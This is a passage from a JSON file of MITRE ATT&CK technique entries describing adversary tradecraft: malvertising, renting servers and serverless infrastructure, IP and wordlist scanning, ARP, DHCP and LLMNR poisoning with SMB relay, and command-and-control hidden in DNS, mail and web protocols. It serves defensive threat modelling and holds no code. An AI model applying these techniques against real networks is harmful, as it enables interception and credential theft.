software.<sup>[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)]</sup><sup>[[FBI-search](https://app.tidalcyber.com/references/deea5b42-bfab-50af-8d85-cc04fd317a82)]</sup> Adversarys efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.<sup>[[sentinelone-malvertising](https://app.tidalcyber.com/references/7989f0de-90b8-5e6d-bc20-1764610d1568)]</sup> \n\nMalvertising may be used to support [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) and [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.<sup>[[BBC-malvertising](https://app.tidalcyber.com/references/425775e4-2948-5a73-a2d8-9a3edca74b1b)]</sup>\n\nAdversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.<sup>[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)]</sup> Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.<sup>[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1583.008"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "60ac24aa-ce63-5c1d-8126-db20a27d85be",
"value": "Malvertising"
},
{
"description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or email servers to support [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) operations. Instead of compromising a third-party [Server](https://app.tidalcyber.com/technique/ce71e252-3403-4287-a0b5-9328fa88af96) or renting a [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.<sup>[[NYTStuxnet](https://app.tidalcyber.com/references/38b0cf78-88d0-487f-b2b0-81264f457dd0)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1583.004"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2",
"value": "Server - Duplicate"
},
{
"description": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) traffic to an adversary-owned command and control server.<sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup><sup>[[AWS Lambda Redirector](https://app.tidalcyber.com/references/9ba87a5d-a140-4959-9905-c4a80e684d56)]</sup> As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.<sup>[[Detecting Command & Control in the Cloud](https://app.tidalcyber.com/references/b12e0288-48cd-46ec-8305-0f4d050782f2)]</sup><sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1583.007"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "c30faf84-496b-4f27-a4bc-aa36d583c69f",
"value": "Serverless - Duplicate"
},
{
"description": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.<sup>[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1583.003"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23",
"value": "Virtual Private Server - Duplicate"
},
{
"description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)), [Exfiltration Over Web Service](https://app.tidalcyber.com/technique/66768217-acdd-4b52-902f-e29483630ad6), or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1583.006"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "2e883e0d-1108-431a-a2dd-98ba98b69417",
"value": "Web Services - Duplicate"
},
{
"description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.<sup>[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]</sup> Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b), including from residential proxy services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[FBI Proxies Credential Stuffing](https://app.tidalcyber.com/references/17f9b7b0-3e1a-5d75-9030-da79fcccdb49)]</sup><sup>[[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)]</sup> Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
},
{
"dest-uuid": "be637d66-5110-4872-bc15-63b062c3f290",
"type": "similar"
},
{
"dest-uuid": "bae33d7b-c835-4eda-b310-bf426270c0b1",
"type": "similar"
},
{
"dest-uuid": "b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d",
"type": "similar"
},
{
"dest-uuid": "60ac24aa-ce63-5c1d-8126-db20a27d85be",
"type": "similar"
},
{
"dest-uuid": "6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2",
"type": "similar"
},
{
"dest-uuid": "c30faf84-496b-4f27-a4bc-aa36d583c69f",
"type": "similar"
},
{
"dest-uuid": "2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23",
"type": "similar"
},
{
"dest-uuid": "2e883e0d-1108-431a-a2dd-98ba98b69417",
"type": "similar"
}
],
"uuid": "66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3",
"value": "Acquire Infrastructure"
},
{
"description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://app.tidalcyber.com/technique/58776ca9-0c54-487f-afcc-e7e5b661bd54), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.<sup>[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1595.001"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "473afdb8-5048-4838-a3fc-56be30be1e56",
"value": "Scanning IP Blocks"
},
{
"description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://app.tidalcyber.com/technique/4acf57da-73c1-4555-a86a-38ea4a8b962d) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.<sup>[[OWASP Vuln Scanning](https://app.tidalcyber.com/references/039c0947-1976-4eb8-bb26-4c74dceea7f0)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1595.002"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "c0a8e0d6-c108-4c15-9a3a-78ef1da06e32",
"value": "Vulnerability Scanning"
},
{
"description": "Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578), or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).\n\nFor example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a websites pages and directories.<sup>[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]</sup> This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a) or [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c)). \n\nAs cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.<sup>[[S3Recon GitHub](https://app.tidalcyber.com/references/803c51be-a54e-4fab-8ea0-c6bef18e84d3)]</sup><sup>[[GCPBucketBrute](https://app.tidalcyber.com/references/d956e1f6-37ca-4352-b275-84c174888b88)]</sup> Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://app.tidalcyber.com/technique/77069b3f-9e42-4f1b-894f-8df568233df2) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1595.003"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "a0e40412-cbfb-477b-87fc-40f2c84d26be",
"value": "Wordlist Scanning"
},
{
"description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.<sup>[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)]</sup><sup>[[OWASP Fingerprinting](https://app.tidalcyber.com/references/ec89a48b-3b00-4928-8450-d2fbd307817f)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
},
{
"dest-uuid": "473afdb8-5048-4838-a3fc-56be30be1e56",
"type": "similar"
},
{
"dest-uuid": "c0a8e0d6-c108-4c15-9a3a-78ef1da06e32",
"type": "similar"
},
{
"dest-uuid": "a0e40412-cbfb-477b-87fc-40f2c84d26be",
"type": "similar"
}
],
"uuid": "a930437d-5a12-4dc4-b311-f5fd6a766c85",
"value": "Active Scanning"
},
{
"description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) or [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243).\n\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.<sup>[[RFC826 ARP](https://app.tidalcyber.com/references/8eef2b68-f932-4cba-8646-bff9a7848532)]</sup> Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\n\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\n\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.<sup>[[Sans ARP Spoofing Aug 2003](https://app.tidalcyber.com/references/1f9f5bfc-c044-4046-8586-39163a305c1e)]</sup><sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup>\n\nAdversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.<sup>[[Sans ARP Spoofing Aug 2003](https://app.tidalcyber.com/references/1f9f5bfc-c044-4046-8586-39163a305c1e)]</sup>\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1557.002"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "03ef726b-ac65-4e23-8130-9d299a3f458a",
"value": "ARP Cache Poisoning"
},
{
"description": "Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) or [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243).\n\nDHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.<sup>[[rfc2131](https://app.tidalcyber.com/references/b16bd2d5-162b-44cb-a812-7becd6684021)]</sup> The typical server-client interaction is as follows: \n\n1. The client broadcasts a `DISCOVER` message.\n\n2. The server responds with an `OFFER` message, which includes an available network address. \n\n3. The client broadcasts a `REQUEST` message, which includes the network address offered. \n\n4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.\n\nAdversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.<sup>[[new_rogue_DHCP_serv_malware](https://app.tidalcyber.com/references/8e0a8a9a-9b1f-4141-b595-80b98daf6b68)]</sup><sup>[[w32.tidserv.g](https://app.tidalcyber.com/references/9d4ac51b-d870-43e8-bc6f-d7159343b00c)]</sup> Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.\n\nDHCPv6 clients can receive network configuration information without being assigned an IP address by sending a <code>INFORMATION-REQUEST (code 11)</code> message to the <code>All_DHCP_Relay_Agents_and_Servers</code> multicast address.<sup>[[rfc3315](https://app.tidalcyber.com/references/9349f864-79e9-4481-ad77-44099621795a)]</sup> Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.\n\nRather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://app.tidalcyber.com/technique/03619027-8a54-4cb2-8f1d-38d476edbdd8)) by generating many broadcast DISCOVER messages to exhaust a networks DHCP allocation pool. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1557.003"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "52dabfcc-b7a4-4334-9014-ab9d82f5527b",
"value": "DHCP Spoofing"
},
{
"description": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. <sup>[[Wikipedia LLMNR](https://app.tidalcyber.com/references/e06d8b82-f61d-49fc-8120-b6d9e5864cc8)]</sup><sup>[[TechNet NetBIOS](https://app.tidalcyber.com/references/f756ee2e-2e79-41df-bf9f-6492a9708663)]</sup>\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) and crack the hashes offline through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) to obtain the plaintext passwords.\n\nIn some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.<sup>[[byt3bl33d3r NTLM Relaying](https://app.tidalcyber.com/references/34deeec2-6edc-492c-bb35-5ccb1dc8e4df)]</sup><sup>[[Secure Ideas SMB Relay](https://app.tidalcyber.com/references/ac4b2e91-f338-44c3-8950-435102136991)]</sup> Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. \n\nSeveral tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://app.tidalcyber.com/software/2a5ea3a7-9873-4a2e-b4b5-4e27a80db305).<sup>[[GitHub NBNSpoof](https://app.tidalcyber.com/references/4119091a-96f8-441c-b66f-ee0d9013d7ca)]</sup><sup>[[Rapid7 LLMNR Spoofer](https://app.tidalcyber.com/references/229b04b6-98ca-4e6f-9917-a26cfe0a7f0d)]</sup><sup>[[GitHub Responder](https://app.tidalcyber.com/references/3ef681a9-4ab0-420b-9d1a-b8152c50b3ca)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1557.001"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "b44a263f-76b2-4a1f-baeb-dd285974eca6",
"value": "LLMNR/NBT-NS Poisoning and SMB Relay"
},
{
"description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243), or replay attacks ([Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.<sup>[[Rapid7 MiTM Basics](https://app.tidalcyber.com/references/33b25966-0ab9-4cc6-9702-62263a23af9c)]</sup>\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.<sup>[[ttint_rat](https://app.tidalcyber.com/references/f3e60cae-3225-4800-bc15-cb46ff715061)]</sup><sup>[[dns_changer_trojans](https://app.tidalcyber.com/references/082a0fde-d9f9-45f2-915d-f14c77b62254)]</sup><sup>[[ad_blocker_with_miner](https://app.tidalcyber.com/references/8e30f71e-80b8-4662-bc95-bf3cf7cfcf40)]</sup> Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup> [Downgrade Attack](https://app.tidalcyber.com/technique/257fffe4-d17b-4e63-a41c-8388936d6215)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.<sup>[[mitm_tls_downgrade_att](https://app.tidalcyber.com/references/af907fe1-1e37-4f44-8ad4-fcc3826ee6fb)]</sup><sup>[[taxonomy_downgrade_att_tls](https://app.tidalcyber.com/references/4459076e-7c79-4855-9091-5aabd274f586)]</sup><sup>[[tlseminar_downgrade_att](https://app.tidalcyber.com/references/8b5d46bf-fb4e-4ecd-b8a9-9c084c1864a3)]</sup>\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) and/or in support of a [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
},
{
"dest-uuid": "03ef726b-ac65-4e23-8130-9d299a3f458a",
"type": "similar"
},
{
"dest-uuid": "52dabfcc-b7a4-4334-9014-ab9d82f5527b",
"type": "similar"
},
{
"dest-uuid": "b44a263f-76b2-4a1f-baeb-dd285974eca6",
"type": "similar"
}
],
"uuid": "d98dbf30-c454-42ff-a9f3-2cd3319cc0d9",
"value": "Adversary-in-the-Middle"
},
{
"description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.<sup>[[PAN DNS Tunneling](https://app.tidalcyber.com/references/efe1c443-475b-45fc-8d33-5bf3bdf941c5)]</sup><sup>[[Medium DnsTunneling](https://app.tidalcyber.com/references/f31de733-406c-4348-b3fe-bdc30d707277)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1071.004"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "5c6c3492-5dbc-43ee-a3f2-ba1976d3b379",
"value": "DNS - Duplicate"
},
{
"description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1071.002"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "a4f21b08-bf5b-4ba3-af69-cce01a467859",
"value": "File Transfer Protocols"
},
{
"description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1071.003"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "350fd3f9-2d62-498f-be62-fc4b9907ff02",
"value": "Mail Protocols"
},
{
"description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S<sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup> and WebSocket<sup>[[Brazking-Websockets](https://app.tidalcyber.com/references/fa813afd-b8f0-535b-9108-6d3d3989b6b9)]</sup> that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1071.001"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
